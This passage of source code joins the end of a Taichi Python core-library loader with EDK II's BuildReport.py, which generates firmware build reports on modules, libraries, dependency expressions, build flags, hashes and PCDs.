shutil.copy(dll_path2, os.path.join(dir, 'taichi_core.pyd'))
os.environ['PATH'] += ';' + dir
sys.path.append(dir)
else:
shutil.copy(dll_path1 if os.path.exists(dll_path1) else dll_path2, os.path.join(bin_dir, 'taichi_core.pyd'))
sys.path.append(bin_dir)
try:
import taichi_core as tc_core
except Exception as e:
print(e)
print()
print(r'Is taichi\external\lib correctly set to branch msvc or mingw?')
print()
raise e
os.chdir(old_wd)
def get_dll_name(name):
if get_os_name() == 'linux':
return 'libtaichi_%s.so' % name
elif get_os_name() == 'osx':
return 'libtaichi_%s.dylib' % name
elif get_os_name() == 'win':
return 'taichi_%s.dll' % name
else:
assert False, "Unknown OS"
def load_module(name, verbose=True):
if verbose:
print('Loading module', name)
try:
if get_os_name() == 'osx':
mode = ctypes.RTLD_LOCAL
else:
mode = ctypes.RTLD_GLOBAL
if '.so' in name:
ctypes.PyDLL(name, mode=mode)
else:
ctypes.PyDLL(
os.path.join(get_repo_directory(), 'build',
get_dll_name(name)), mode=mode)
except Exception as e:
print(Fore.YELLOW + "Warning: module [{}] loading failed: {}".format(
name, e) + Style.RESET_ALL)
def at_startup():
if not is_release():
output_dir = get_output_directory()
if not os.path.exists(output_dir):
print('Making output directory')
os.mkdir(output_dir)
# Load modules
# load_module('lang_core')
tc_core.set_core_state_python_imported(True)
def start_memory_monitoring(output_fn, pid=-1, interval=1):
# removing dependency on psutil
return
import os, psutil, time
if pid == -1:
pid = os.getpid()
import multiprocessing
def task():
with open(output_fn, 'w') as f:
process = psutil.Process(pid)
while True:
try:
mem = process.memory_info().rss
except:
mem = -1
time.sleep(interval)
print(time.time(), mem, file=f)
f.flush()
proc = multiprocessing.Process(target=task, daemon=True)
proc.start()
@atexit.register
def clean_libs():
pass
at_startup()
|
BuildReport.py
|
## @file
# Routines for generating build report.
#
# This module contains the functionality to generate build report after
# build all target completes successfully.
#
# Copyright (c) 2010 - 2018, Intel Corporation. All rights reserved.<BR>
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
## Import Modules
#
import Common.LongFilePathOs as os
import re
import platform
import textwrap
import traceback
import sys
import time
import struct
import hashlib
import subprocess
import threading
from datetime import datetime
from io import BytesIO
from Common import EdkLogger
from Common.Misc import SaveFileOnChange
from Common.Misc import GuidStructureByteArrayToGuidString
from Common.Misc import GuidStructureStringToGuidString
from Common.BuildToolError import FILE_WRITE_FAILURE
from Common.BuildToolError import CODE_ERROR
from Common.BuildToolError import COMMAND_FAILURE
from Common.BuildToolError import FORMAT_INVALID
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
import Common.GlobalData as GlobalData
from AutoGen.ModuleAutoGen import ModuleAutoGen
from Common.Misc import PathClass
from Common.StringUtils import NormPath
from Common.DataType import *
import collections
from Common.Expression import *
from GenFds.AprioriSection import DXE_APRIORI_GUID, PEI_APRIORI_GUID
## Pattern to extract contents in EDK DXS files
gDxsDependencyPattern = re.compile(r"DEPENDENCY_START(.+)DEPENDENCY_END", re.DOTALL)
## Pattern to find total FV total size, occupied size in flash report intermediate file
gFvTotalSizePattern = re.compile(r"EFI_FV_TOTAL_SIZE = (0x[0-9a-fA-F]+)")
gFvTakenSizePattern = re.compile(r"EFI_FV_TAKEN_SIZE = (0x[0-9a-fA-F]+)")
## Pattern to find module size and time stamp in module summary report intermediate file
gModuleSizePattern = re.compile(r"MODULE_SIZE = (\d+)")
gTimeStampPattern = re.compile(r"TIME_STAMP = (\d+)")
## Pattern to find GUID value in flash description files
gPcdGuidPattern = re.compile(r"PCD\((\w+)[.](\w+)\)")
## Pattern to collect offset, GUID value pair in the flash report intermediate file
gOffsetGuidPattern = re.compile(r"(0x[0-9A-Fa-f]+) ([-A-Fa-f0-9]+)")
## Pattern to find module base address and entry point in fixed flash map file
gModulePattern = r"\n[-\w]+\s*\(([^,]+),\s*BaseAddress=%(Address)s,\s*EntryPoint=%(Address)s\)\s*\(GUID=([-0-9A-Fa-f]+)[^)]*\)"
gMapFileItemPattern = re.compile(gModulePattern % {"Address" : "(-?0[xX][0-9A-Fa-f]+)"})
## Pattern to find all module referenced header files in source files
gIncludePattern = re.compile(r'#include\s*["<]([^">]+)[">]')
gIncludePattern2 = re.compile(r"#include\s+EFI_([A-Z_]+)\s*[(]\s*(\w+)\s*[)]")
## Pattern to find the entry point for EDK module using EDKII Glue library
gGlueLibEntryPoint = re.compile(r"__EDKII_GLUE_MODULE_ENTRY_POINT__\s*=\s*(\w+)")
## Tags for MaxLength of line in report
gLineMaxLength = 120
## Tags for end of line in report
gEndOfLine = "\r\n"
## Tags for section start, end and separator
gSectionStart = ">" + "=" * (gLineMaxLength - 2) + "<"
gSectionEnd = "<" + "=" * (gLineMaxLength - 2) + ">" + "\n"
gSectionSep = "=" * gLineMaxLength
## Tags for subsection start, end and separator
gSubSectionStart = ">" + "-" * (gLineMaxLength - 2) + "<"
gSubSectionEnd = "<" + "-" * (gLineMaxLength - 2) + ">"
gSubSectionSep = "-" * gLineMaxLength
## The look up table to map PCD type to pair of report display type and DEC type
gPcdTypeMap = {
TAB_PCDS_FIXED_AT_BUILD : ('FIXED', TAB_PCDS_FIXED_AT_BUILD),
TAB_PCDS_PATCHABLE_IN_MODULE: ('PATCH', TAB_PCDS_PATCHABLE_IN_MODULE),
TAB_PCDS_FEATURE_FLAG : ('FLAG', TAB_PCDS_FEATURE_FLAG),
TAB_PCDS_DYNAMIC : ('DYN', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_HII : ('DYNHII', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_VPD : ('DYNVPD', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_EX : ('DEX', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_HII : ('DEXHII', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_VPD : ('DEXVPD', TAB_PCDS_DYNAMIC_EX),
}
## The look up table to map module type to driver type
gDriverTypeMap = {
SUP_MODULE_SEC : '0x3 (SECURITY_CORE)',
SUP_MODULE_PEI_CORE : '0x4 (PEI_CORE)',
SUP_MODULE_PEIM : '0x6 (PEIM)',
SUP_MODULE_DXE_CORE : '0x5 (DXE_CORE)',
SUP_MODULE_DXE_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SAL_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SMM_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_RUNTIME_DRIVER: '0x7 (DRIVER)',
SUP_MODULE_UEFI_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_UEFI_APPLICATION : '0x9 (APPLICATION)',
SUP_MODULE_SMM_CORE : '0xD (SMM_CORE)',
'SMM_DRIVER' : '0xA (SMM)', # Extension of module type to support PI 1.1 SMM drivers
SUP_MODULE_MM_STANDALONE : '0xE (MM_STANDALONE)',
SUP_MODULE_MM_CORE_STANDALONE : '0xF (MM_CORE_STANDALONE)'
}
## The look up table of the supported opcode in the dependency expression binaries
gOpCodeList = ["BEFORE", "AFTER", "PUSH", "AND", "OR", "NOT", "TRUE", "FALSE", "END", "SOR"]
## Save VPD Pcd
VPDPcdList = []
##
# Writes a string to the file object.
#
# This function writes a string to the file object and a new line is appended
# afterwards. It may optionally wrap the string for better readability.
#
# @File The file object to write
# @String The string to be written to the file
# @Wrapper Indicates whether to wrap the string
#
def FileWrite(File, String, Wrapper=False):
if Wrapper:
String = textwrap.fill(String, 120)
File.append(String + gEndOfLine)
def ByteArrayForamt(Value):
IsByteArray = False
SplitNum = 16
ArrayList = []
if Value.startswith('{') and Value.endswith('}') and not Value.startswith("{CODE("):
Value = Value[1:-1]
ValueList = Value.split(',')
if len(ValueList) >= SplitNum:
IsByteArray = True
if IsByteArray:
if ValueList:
Len = len(ValueList) // SplitNum
for i, element in enumerate(ValueList):
ValueList[i] = '0x%02X' % int(element.strip(), 16)
if Len:
Id = 0
while (Id <= Len):
End = min(SplitNum*(Id+1), len(ValueList))
Str = ','.join(ValueList[SplitNum*Id : End])
if End == len(ValueList):
Str += '}'
ArrayList.append(Str)
break
else:
Str += ','
ArrayList.append(Str)
Id += 1
else:
ArrayList = [Value + '}']
return IsByteArray, ArrayList
##
# Find all the header file that the module source directly includes.
#
# This function scans source code to find all header files the module may
# include. This is not fully accurate, but it is very effective at finding all
# the header files the module might include via #include statements.
#
# @Source The source file name
# @IncludePathList The list of include path to find the source file.
# @IncludeFiles The dictionary of current found include files.
#
def FindIncludeFiles(Source, IncludePathList, IncludeFiles):
FileContents = open(Source).read()
#
# Find header files with pattern #include "XXX.h" or #include <XXX.h>
#
for Match in gIncludePattern.finditer(FileContents):
FileName = Match.group(1).strip()
for Dir in [os.path.dirname(Source)] + IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
#
# Find header files with pattern like #include EFI_PPI_CONSUMER(XXX)
#
for Match in gIncludePattern2.finditer(FileContents):
Key = Match.group(2)
Type = Match.group(1)
if "ARCH_PROTOCOL" in Type:
FileName = "ArchProtocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PROTOCOL" in Type:
FileName = "Protocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PPI" in Type:
FileName = "Ppi/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif TAB_GUID in Type:
FileName = "Guid/%(Key)s/%(Key)s.h" % {"Key" : Key}
else:
continue
for Dir in IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
## Split each lines in file
#
# This method is used to split the lines in file to make the length of each line
# less than MaxLength.
#
# @param Content The content of file
# @param MaxLength The Max Length of the line
#
def FileLinesSplit(Content=None, MaxLength=None):
ContentList = Content.split(TAB_LINE_BREAK)
NewContent = ''
NewContentList = []
for Line in ContentList:
while len(Line.rstrip()) > MaxLength:
LineSpaceIndex = Line.rfind(TAB_SPACE_SPLIT, 0, MaxLength)
LineSlashIndex = Line.rfind(TAB_SLASH, 0, MaxLength)
LineBackSlashIndex = Line.rfind(TAB_BACK_SLASH, 0, MaxLength)
if max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex) > 0:
LineBreakIndex = max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex)
else:
LineBreakIndex = MaxLength
NewContentList.append(Line[:LineBreakIndex])
Line = Line[LineBreakIndex:]
if Line:
NewContentList.append(Line)
for NewLine in NewContentList:
NewContent += NewLine + TAB_LINE_BREAK
NewContent = NewContent.replace(gEndOfLine, TAB_LINE_BREAK).replace('\r\r\n', gEndOfLine)
return NewContent
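## --- illustration (sketch, not called by the build report code) --------------
# Shows how the two helpers above behave; it assumes the BaseTools environment
# this file belongs to (gLineMaxLength is defined above, TAB_LINE_BREAK comes
# from Common.DataType via the wildcard import).
def _ExampleReportHelpers():
    # Long PCD byte arrays are re-chunked into 16-value lines for the report.
    IsByteArray, ArrayLines = ByteArrayForamt("{" + ",".join(["0x00"] * 20) + "}")
    # Free-form text is wrapped so no report line exceeds gLineMaxLength.
    Wrapped = FileLinesSplit("A " * 200, gLineMaxLength)
    return IsByteArray, ArrayLines, Wrapped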
##
# Parse binary dependency expression section
#
# This utility class parses the dependency expression section and translates the readable
# GUID name and value.
#
class DepexParser(object):
##
# Constructor function for class DepexParser
#
# This constructor function collects GUID values so that the readable
# GUID name can be translated.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._GuidDb = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for Protocol in Package.Protocols:
GuidValue = GuidStructureStringToGuidString(Package.Protocols[Protocol])
self._GuidDb[GuidValue.upper()] = Protocol
for Ppi in Package.Ppis:
GuidValue = GuidStructureStringToGuidString(Package.Ppis[Ppi])
self._GuidDb[GuidValue.upper()] = Ppi
for Guid in Package.Guids:
GuidValue = GuidStructureStringToGuidString(Package.Guids[Guid])
self._GuidDb[GuidValue.upper()] = Guid
for Ma in Pa.ModuleAutoGenList:
for Pcd in Ma.FixedVoidTypePcds:
PcdValue = Ma.FixedVoidTypePcds[Pcd]
if len(PcdValue.split(',')) == 16:
GuidValue = GuidStructureByteArrayToGuidString(PcdValue)
self._GuidDb[GuidValue.upper()] = Pcd
##
# Parse the binary dependency expression files.
#
    # This function parses the binary dependency expression file and translates
    # it into an instruction list.
#
# @param self The object pointer
# @param DepexFileName The file name of binary dependency expression file.
#
def ParseDepexFile(self, DepexFileName):
DepexFile = open(DepexFileName, "rb")
DepexStatement = []
OpCode = DepexFile.read(1)
while OpCode:
Statement = gOpCodeList[struct.unpack("B", OpCode)[0]]
if Statement in ["BEFORE", "AFTER", "PUSH"]:
GuidValue = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" % \
struct.unpack(PACK_PATTERN_GUID, DepexFile.read(16))
GuidString = self._GuidDb.get(GuidValue, GuidValue)
Statement = "%s %s" % (Statement, GuidString)
DepexStatement.append(Statement)
OpCode = DepexFile.read(1)
return DepexStatement
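    #
    # Illustrative sketch of ParseDepexFile output (hypothetical GUIDs): each
    # opcode byte is mapped through gOpCodeList, and PUSH/BEFORE/AFTER opcodes
    # are followed by a 16-byte GUID that is translated via self._GuidDb when a
    # readable name is known:
    #
    #   Parser = DepexParser(Wa)                    # Wa: workspace context object
    #   for Line in Parser.ParseDepexFile("Sample.depex"):
    #       print(Line)
    #   # e.g. "PUSH gEfiPcdProtocolGuid", "PUSH 13AC6DD0-...", "AND", "END"
    #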
##
# Reports library information
#
# This class reports the module library subsection in the build report file.
#
class LibraryReport(object):
##
# Constructor function for class LibraryReport
#
# This constructor function generates LibraryReport object for
# a module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.LibraryList = []
for Lib in M.DependentLibraryList:
LibInfPath = str(Lib)
LibClassList = Lib.LibraryClass[0].LibraryClass
LibConstructorList = Lib.ConstructorList
            LibDestructorList = Lib.DestructorList
            LibDepexList = Lib.DepexExpression[M.Arch, M.ModuleType]
            LibTime = ''
            for LibAutoGen in M.LibraryAutoGenList:
                if LibInfPath == LibAutoGen.MetaFile.Path:
                    LibTime = LibAutoGen.BuildTime
                    break
            self.LibraryList.append((LibInfPath, LibClassList, LibConstructorList, LibDestructorList, LibDepexList, LibTime))
##
# Generate report for module library information
#
# This function generates report for the module library.
    # If the module is an EDKII-style one, the additional library class, library
# constructor/destructor and dependency expression may also be reported.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if len(self.LibraryList) > 0:
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_LIBRARY)
FileWrite(File, gSubSectionSep)
for LibraryItem in self.LibraryList:
LibInfPath = LibraryItem[0]
FileWrite(File, LibInfPath)
LibClass = LibraryItem[1]
EdkIILibInfo = ""
LibConstructor = " ".join(LibraryItem[2])
if LibConstructor:
EdkIILibInfo += " C = " + LibConstructor
LibDestructor = " ".join(LibraryItem[3])
if LibDestructor:
EdkIILibInfo += " D = " + LibDestructor
LibDepex = " ".join(LibraryItem[4])
if LibDepex:
EdkIILibInfo += " Depex = " + LibDepex
if LibraryItem[5]:
EdkIILibInfo += " Time = " + LibraryItem[5]
if EdkIILibInfo:
FileWrite(File, "{%s: %s}" % (LibClass, EdkIILibInfo))
else:
FileWrite(File, "{%s}" % LibClass)
FileWrite(File, gSubSectionEnd)
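    #
    # Illustrative sketch of the library subsection emitted above (hypothetical
    # module): each dependent library INF path is followed by a summary of its
    # library class and, when present, its constructor, destructor, depex and
    # build time:
    #
    #   LibraryReport(ModuleAutoGen).GenerateReport(ReportFile)
    #   # MdePkg/Library/BaseLib/BaseLib.inf
    #   # {BaseLib}
    #   # MdeModulePkg/Library/SomeLib/SomeLib.inf    (hypothetical path)
    #   # {SomeLib: C = SomeLibConstructor}
    #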
##
# Reports dependency expression information
#
# This class reports the module dependency expression subsection in the build report file.
#
class DepexReport(object):
##
# Constructor function for class DepexReport
#
# This constructor function generates DepexReport object for
    # a module. If the module source contains a DXS file (usually an EDK-style
    # module), it uses the dependency in the DXS file; otherwise, it uses the
    # dependency expression from its own INF [Depex] section and then merges it
    # with the ones from its dependent library INFs.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.Depex = ""
self._DepexFileName = os.path.join(M.BuildDir, "OUTPUT", M.Module.BaseName + ".depex")
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
if ModuleType in [SUP_MODULE_SEC, SUP_MODULE_PEI_CORE, SUP_MODULE_DXE_CORE, SUP_MODULE_SMM_CORE, SUP_MODULE_MM_CORE_STANDALONE, SUP_MODULE_UEFI_APPLICATION]:
return
for Source in M.SourceFileList:
if os.path.splitext(Source.Path)[1].lower() == ".dxs":
Match = gDxsDependencyPattern.search(open(Source.Path).read())
if Match:
self.Depex = Match.group(1).strip()
self.Source = "DXS"
break
else:
self.Depex = M.DepexExpressionDict.get(M.ModuleType, "")
self.ModuleDepex = " ".join(M.Module.DepexExpression[M.Arch, M.ModuleType])
if not self.ModuleDepex:
self.ModuleDepex = "(None)"
LibDepexList = []
for Lib in M.DependentLibraryList:
LibDepex = " ".join(Lib.DepexExpression[M.Arch, M.ModuleType]).strip()
if LibDepex != "":
LibDepexList.append("(" + LibDepex + ")")
self.LibraryDepex = " AND ".join(LibDepexList)
if not self.LibraryDepex:
self.LibraryDepex = "(None)"
self.Source = "INF"
##
# Generate report for module dependency expression information
#
# This function generates report for the module dependency expression.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalDepexParser The platform global Dependency expression parser object
#
def GenerateReport(self, File, GlobalDepexParser):
if not self.Depex:
return
FileWrite(File, gSubSectionStart)
if os.path.isfile(self._DepexFileName):
try:
DepexStatements = GlobalDepexParser.ParseDepexFile(self._DepexFileName)
FileWrite(File, "Final Dependency Expression (DEPEX) Instructions")
for DepexStatement in DepexStatements:
FileWrite(File, " %s" % DepexStatement)
FileWrite(File, gSubSectionSep)
            except Exception:
EdkLogger.warn(None, "Dependency expression file is corrupted", self._DepexFileName)
FileWrite(File, "Dependency Expression (DEPEX) from %s" % self.Source)
if self.Source == "INF":
FileWrite(File, self.Depex, True)
FileWrite(File, gSubSectionSep)
FileWrite(File, "From Module INF: %s" % self.ModuleDepex, True)
FileWrite(File, "From Library INF: %s" % self.LibraryDepex, True)
else:
FileWrite(File, self.Depex)
FileWrite(File, gSubSectionEnd)
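    #
    # Illustrative sketch of the dependency expression subsection (hypothetical
    # content): when the final .depex binary exists it is decoded first, then the
    # source-level expression is reported, split by origin for an INF-sourced
    # depex:
    #
    #   DepexReport(ModuleAutoGen).GenerateReport(ReportFile, GlobalDepexParser)
    #   # Final Dependency Expression (DEPEX) Instructions
    #   #   PUSH gEfiVariableArchProtocolGuid
    #   #   END
    #   # Dependency Expression (DEPEX) from INF
    #   # From Module INF: gEfiVariableArchProtocolGuid
    #   # From Library INF: (None)
    #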
##
# Reports module build flags information
#
# This class reports the module build flags subsection in the build report file.
#
class BuildFlagsReport(object):
##
# Constructor function for class BuildFlagsReport
#
# This constructor function generates BuildFlagsReport object for
# a module. It reports the build tool chain tag and all relevant
# build flags to build the module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
BuildOptions = {}
#
# Add build flags according to source file extension so that
# irrelevant ones can be filtered out.
#
for Source in M.SourceFileList:
Ext = os.path.splitext(Source.File)[1].lower()
if Ext in [".c", ".cc", ".cpp"]:
BuildOptions["CC"] = 1
elif Ext in [".s", ".asm"]:
BuildOptions["PP"] = 1
BuildOptions["ASM"] = 1
elif Ext in [".vfr"]:
BuildOptions["VFRPP"] = 1
BuildOptions["VFR"] = 1
elif Ext in [".dxs"]:
BuildOptions["APP"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asl"]:
BuildOptions["ASLPP"] = 1
BuildOptions["ASL"] = 1
elif Ext in [".aslc"]:
BuildOptions["ASLCC"] = 1
BuildOptions["ASLDLINK"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asm16"]:
BuildOptions["ASMLINK"] = 1
BuildOptions["SLINK"] = 1
BuildOptions["DLINK"] = 1
#
# Save module build flags.
#
self.ToolChainTag = M.ToolChain
self.BuildFlags = {}
for Tool in BuildOptions:
self.BuildFlags[Tool + "_FLAGS"] = M.BuildOption.get(Tool, {}).get("FLAGS", "")
##
# Generate report for module build flags information
#
# This function generates report for the module build flags expression.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSubSectionStart)
FileWrite(File, "Build Flags")
FileWrite(File, "Tool Chain Tag: %s" % self.ToolChainTag)
for Tool in self.BuildFlags:
FileWrite(File, gSubSectionSep)
FileWrite(File, "%s = %s" % (Tool, self.BuildFlags[Tool]), True)
FileWrite(File, gSubSectionEnd)
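    #
    # Illustrative sketch of the build flags subsection (hypothetical flags): one
    # "<TOOL>_FLAGS = ..." entry is printed for each tool selected from the
    # module's source file extensions in the constructor above:
    #
    #   BuildFlagsReport(ModuleAutoGen).GenerateReport(ReportFile)
    #   # Build Flags
    #   # Tool Chain Tag: GCC5
    #   # CC_FLAGS = <compiler flags used for this module>
    #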
##
# Reports individual module information
#
# This class reports the module section in the build report file.
# It comprises the module summary, module PCD, library, dependency expression,
# and build flags sections.
#
class ModuleReport(object):
##
# Constructor function for class ModuleReport
#
# This constructor function generates ModuleReport object for
# a separate module in a platform build.
#
# @param self The object pointer
# @param M Module context information
# @param ReportType The kind of report items in the final report file
#
def __init__(self, M, ReportType):
self.ModuleName = M.Module.BaseName
self.ModuleInfPath = M.MetaFile.File
self.ModuleArch = M.Arch
self.FileGuid = M.Guid
self.Size = 0
self.BuildTimeStamp = None
self.Hash = 0
self.DriverType = ""
if not M.IsLibrary:
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
#
            # If a module complies with PI 1.1, promote the module type to "SMM_DRIVER"
#
if ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpec = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "0x00010000")
if int(PiSpec, 0) >= 0x0001000A:
ModuleType = "SMM_DRIVER"
self.DriverType = gDriverTypeMap.get(ModuleType, "0x2 (FREE_FORM)")
self.UefiSpecVersion = M.Module.Specification.get("UEFI_SPECIFICATION_VERSION", "")
self.PiSpecVersion = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "")
self.PciDeviceId = M.Module.Defines.get("PCI_DEVICE_ID", "")
self.PciVendorId = M.Module.Defines.get("PCI_VENDOR_ID", "")
self.PciClassCode = M.Module.Defines.get("PCI_CLASS_CODE", "")
self.BuildTime = M.BuildTime
self._BuildDir = M.BuildDir
self.ModulePcdSet = {}
if "PCD" in ReportType:
#
            # Collect the set of all PCDs used by the module: those referenced
            # directly or indirectly by the module INF. Their module INF default
            # values are also saved, if they exist.
#
for Pcd in M.ModulePcdList + M.LibraryPcdList:
self.ModulePcdSet.setdefault((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Pcd.Type), (Pcd.InfDefaultValue, Pcd.DefaultValue))
self.LibraryReport = None
if "LIBRARY" in ReportType:
self.LibraryReport = LibraryReport(M)
self.DepexReport = None
if "DEPEX" in ReportType:
self.DepexReport = DepexReport(M)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport = BuildFlagsReport(M)
##
# Generate report for module information
#
    # This function generates the report for a separate module
    # in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalPcdReport The platform global PCD report object
# @param GlobalPredictionReport The platform global Prediction report object
# @param GlobalDepexParser The platform global Dependency expression parser object
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, GlobalPcdReport, GlobalPredictionReport, GlobalDepexParser, ReportType):
FileWrite(File, gSectionStart)
FwReportFileName = os.path.join(self._BuildDir, "OUTPUT", self.ModuleName + ".txt")
if os.path.isfile(FwReportFileName):
try:
FileContents = open(FwReportFileName).read()
Match = gModuleSizePattern.search(FileContents)
if Match:
self.Size = int(Match.group(1))
Match = gTimeStampPattern.search(FileContents)
if Match:
self.BuildTimeStamp = datetime.utcfromtimestamp(int(Match.group(1)))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FwReportFileName)
if "HASH" in ReportType:
OutputDir = os.path.join(self._BuildDir, "OUTPUT")
DefaultEFIfile = os.path.join(OutputDir, self.ModuleName + ".efi")
if os.path.isfile(DefaultEFIfile):
Tempfile = os.path.join(OutputDir, self.ModuleName + "_hash.tmp")
# rebase the efi image since its base address may not zero
cmd = ["GenFw", "--rebase", str(0), "-o", Tempfile, DefaultEFIfile]
try:
PopenObject = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
except Exception as X:
EdkLogger.error("GenFw", COMMAND_FAILURE, ExtraData="%s: %s" % (str(X), cmd[0]))
EndOfProcedure = threading.Event()
EndOfProcedure.clear()
if PopenObject.stderr:
StdErrThread = threading.Thread(target=ReadMessage, args=(PopenObject.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
PopenObject.wait()
if PopenObject.stderr:
StdErrThread.join()
if PopenObject.returncode != 0:
EdkLogger.error("GenFw", COMMAND_FAILURE, "Failed to generate firmware hash image for %s" % (DefaultEFIfile))
if os.path.isfile(Tempfile):
self.Hash = hashlib.sha1()
buf = open(Tempfile, 'rb').read()
                    self.Hash.update(buf)
self.Hash = self.Hash.hexdigest()
os.remove(Tempfile)
FileWrite(File, "Module Summary")
FileWrite(File, "Module Name: %s" % self.ModuleName)
FileWrite(File, "Module Arch: %s" % self.ModuleArch)
FileWrite(File, "Module INF Path: %s" % self.ModuleInfPath)
FileWrite(File, "File GUID: %s" % self.FileGuid)
if self.Size:
FileWrite(File, "Size: 0x%X (%.2fK)" % (self.Size, self.Size / 1024.0))
if self.Hash:
FileWrite(File, "SHA1 HASH: %s *%s" % (self.Hash, self.ModuleName + ".efi"))
if self.BuildTimeStamp:
FileWrite(File, "Build Time Stamp: %s" % self.BuildTimeStamp)
if self.BuildTime:
FileWrite(File, "Module Build Time: %s" % self.BuildTime)
if self.DriverType:
FileWrite(File, "Driver Type: %s" % self.DriverType)
if self.UefiSpecVersion:
FileWrite(File, "UEFI Spec Version: %s" % self.UefiSpecVersion)
if self.PiSpecVersion:
FileWrite(File, "PI Spec Version: %s" % self.PiSpecVersion)
if self.PciDeviceId:
FileWrite(File, "PCI Device ID: %s" % self.PciDeviceId)
if self.PciVendorId:
FileWrite(File, "PCI Vendor ID: %s" % self.PciVendorId)
if self.PciClassCode:
FileWrite(File, "PCI Class Code: %s" % self.PciClassCode)
FileWrite(File, gSectionSep)
if "PCD" in ReportType:
GlobalPcdReport.GenerateReport(File, self.ModulePcdSet)
if "LIBRARY" in ReportType:
self.LibraryReport.GenerateReport(File)
if "DEPEX" in ReportType:
self.DepexReport.GenerateReport(File, GlobalDepexParser)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport.GenerateReport(File)
if "FIXED_ADDRESS" in ReportType and self.FileGuid:
GlobalPredictionReport.GenerateReport(File, self.FileGuid)
FileWrite(File, gSectionEnd)
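    #
    # Illustrative sketch of the optional "HASH" step above (hypothetical file
    # names): the .efi image is rebased to 0 with GenFw so that the digest does
    # not depend on the link-time base address, and the SHA1 of the rebased image
    # is written into the module summary as the "SHA1 HASH:" line:
    #
    #   cmd = ["GenFw", "--rebase", "0", "-o", "Module_hash.tmp", "Module.efi"]
    #   # subprocess runs GenFw, then hashlib.sha1() digests the temporary file.
    #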
def ReadMessage(From, To, ExitFlag):
while True:
# read one line a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != b"":
To(Line.rstrip().decode(encoding='utf-8', errors='ignore'))
else:
break
if ExitFlag.isSet():
break
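#
# Illustrative usage sketch of ReadMessage (hypothetical command name): it is
# meant to run on a worker thread, forwarding each line read from a subprocess
# pipe to a logger callback until the pipe closes or the ExitFlag event is set:
#
#   Proc = subprocess.Popen("SomeBuildTool", stdout=subprocess.PIPE,
#                           stderr=subprocess.PIPE, shell=True)
#   Done = threading.Event()
#   threading.Thread(target=ReadMessage,
#                    args=(Proc.stderr, EdkLogger.quiet, Done)).start()
#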
##
# Reports platform and module PCD information
#
# This class reports the platform PCD section and module PCD subsection
# in the build report file.
#
class PcdReport(object):
##
# Constructor function for class PcdReport
#
    # This constructor function generates a PcdReport object for a platform build.
# It collects the whole PCD database from platform DSC files, platform
# flash description file and package DEC files.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self.AllPcds = {}
self.UnusedPcds = {}
self.ConditionalPcds = {}
self.MaxLen = 0
self.Arch = None
if Wa.FdfProfile:
self.FdfPcdSet = Wa.FdfProfile.PcdDict
else:
self.FdfPcdSet = {}
self.DefaultStoreSingle = True
self.SkuSingle = True
if GlobalData.gDefaultStores and len(GlobalData.gDefaultStores) > 1:
self.DefaultStoreSingle = False
if GlobalData.gSkuids and len(GlobalData.gSkuids) > 1:
self.SkuSingle = False
self.ModulePcdOverride = {}
for Pa in Wa.AutoGenObjectList:
self.Arch = Pa.Arch
#
# Collect all platform referenced PCDs and grouped them by PCD token space
# GUID C Names
#
for Pcd in Pa.AllPcdList:
PcdList = self.AllPcds.setdefault(Pcd.TokenSpaceGuidCName, {}).setdefault(Pcd.Type, [])
if Pcd not in PcdList:
PcdList.append(Pcd)
if len(Pcd.TokenCName) > self.MaxLen:
